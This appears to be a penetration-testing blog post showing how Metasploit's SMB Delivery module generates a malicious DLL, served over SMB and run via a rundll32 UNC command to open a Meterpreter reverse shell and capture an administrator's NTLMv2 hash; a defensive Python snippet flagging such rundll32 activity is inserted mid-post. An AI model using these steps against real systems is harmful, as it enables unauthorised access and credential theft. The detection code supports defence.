Published in R3d Buck3T

DLL Injection Over SMB Service

Privilege Escalation & Defense Evasion — MITRE ATT&CK (T1055)

Metasploit Framework

Dynamic Link Libraries, known as DLLs, are blocks of code and data that provide functions Windows programs load and call at run time. If a DLL is malicious, it can execute arbitrary code in memory and perform various nefarious operations.

An attacker can write a malicious DLL that gets injected into memory to elevate their privileges or evade detection. They can use this technique to gain initial network access or to establish persistence.

In a red team assessment, attackers can embed DLLs in macros within Microsoft Office documents and deliver them to the target through a spear-phishing campaign. Once a target opens the document and clicks to enable the macro, the DLL payload triggers, and the attacker gains a reverse shell that allows them to execute commands on the compromised machine.

In this post, we will learn about the Metasploit module SMB Delivery, which generates malicious DLL payloads and serves them via an SMB server.

Requirements ✏️

  • Metasploit Module — SMB Delivery
  • Windows machine as a target
  • Open SMB port — (TCP 445)

Objectives 🎯

  • The goal is to gain initial access to a network or establish persistence.

Attack Steps 🔥

In the Kali machine, open up Metasploit with sudo msfconsole, search for the SMB Delivery module, and type use 0 to select it.

Figure 1 — shows selecting the SMB Delivery module.

Next, type options to show details about the selected module. The required options to run the exploit are the target IP address (SRVHOST) and port number 445 (SRVPORT). The payload can be reverse_https or reverse_tcp; in this demo, I used reverse_tcp.

💡 One thing to note is that I had trouble setting the IP address of the SRVHOST with this module. Every time I ran the exploit with a specified IP address, I would get BindFail errors: “[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable.”

Figure 2 — shows the generated BindFail error when the SRVHOST IP was set.

After researching and digging into older comments on GitHub for Metasploit bind errors, I learned that this module is buggy on Metasploit Framework version v6.2.4-dev. The only solution that worked for me was running the exploit without setting the SRVHOST IP address (later replacing it with the listener IP address).

Figure 3 — shows the module details without setting the SRVHOST IP.

For the payload information, ensure you have the correct listener address (your attacking machine's IP address) and any port number that is not in use. Once everything is ready, type run or exploit to run the module.

Figure 4 — shows the generated DLL file after running the module.

When the payload is generated (rundll32.exe \\\tASoq\test.dll,0), replace the host portion of the UNC path with the attacker IP address: rundll32.exe \\\tASoq\test.dll,0.

The generated payload uses rundll32.exe, a legitimate Windows utility that loads the .dll from the SMB share and runs its exported function in memory, so no DLL file has to be written to the target's disk.
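From the defender's side, the distinctive shape of this payload is rundll32.exe loading a DLL from a UNC path. The following is an added example, not code from the post or from Metasploit: a small check over constructed Sysmon-style process-creation records (the field names and the 192.0.2.10 address are assumptions) that flags that pattern and the numeric ordinal entry point the generated command uses.

```python
import re

# Constructed sample records in the shape of Sysmon Event ID 1 (process creation).
# Index 0: benign rundll32 use; index 1: rundll32 loading a DLL over SMB, as the
# SMB Delivery payload does; index 2: a UNC path, but not rundll32.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Windows\System32\shell32.dll",Control_RunDLL',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\192.0.2.10\tASoq\test.dll,0",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe \\fileserver\docs\readme.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# \\host\share\...\name.dll anywhere in the command line
UNC_DLL = re.compile(r"\\\\(?P<host>[^\\\s]+)\\(?P<share>[^\\\s]+)\\[^\s,]+\.dll", re.IGNORECASE)
# ".dll,0" or ".dll,#12": entry point given as an ordinal rather than an export name
ORDINAL_ENTRY = re.compile(r"\.dll,\s*#?\d+\b", re.IGNORECASE)


def classify_event(event):
    """Return the list of indicators raised by one process-creation event (empty if none)."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith("\\rundll32.exe"):
        return []
    findings = []
    m = UNC_DLL.search(cmd)
    if m:
        findings.append(
            f"rundll32 loading DLL from SMB share \\\\{m.group('host')}\\{m.group('share')}")
    if ORDINAL_ENTRY.search(cmd):
        findings.append("rundll32 invoked with a numeric ordinal entry point")
    return findings


def scan_events(events):
    """Return (index, findings) for every event that raised at least one indicator."""
    return [(i, f) for i, e in enumerate(events) if (f := classify_event(e))]


if __name__ == "__main__":
    for idx, findings in scan_events(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], findings)
```

Outbound SMB (TCP 445) from workstations to an address that is not a known file server is the matching network-side signal for the same activity.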

Figure 5 — shows the modified payload with the target IP address.

The following step is to execute the payload on the target machine; you can run it from File Explorer or from a PowerShell/CMD prompt.

💡 This post only shows how to generate DLL files with the SMB Delivery module; in future posts, we will discuss how to deliver these payloads in real-world scenarios.

Figure 6 — shows executing the payload on the target server using File Explorer.

When the payload is executed successfully, a Meterpreter shell opens and shows the captured NTLMv2 hash of the compromised user. In this case, it was the administrator hash.

That’s all for this post; thanks for stopping by!!

Nairuz Abulhul

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester >>Security Researcher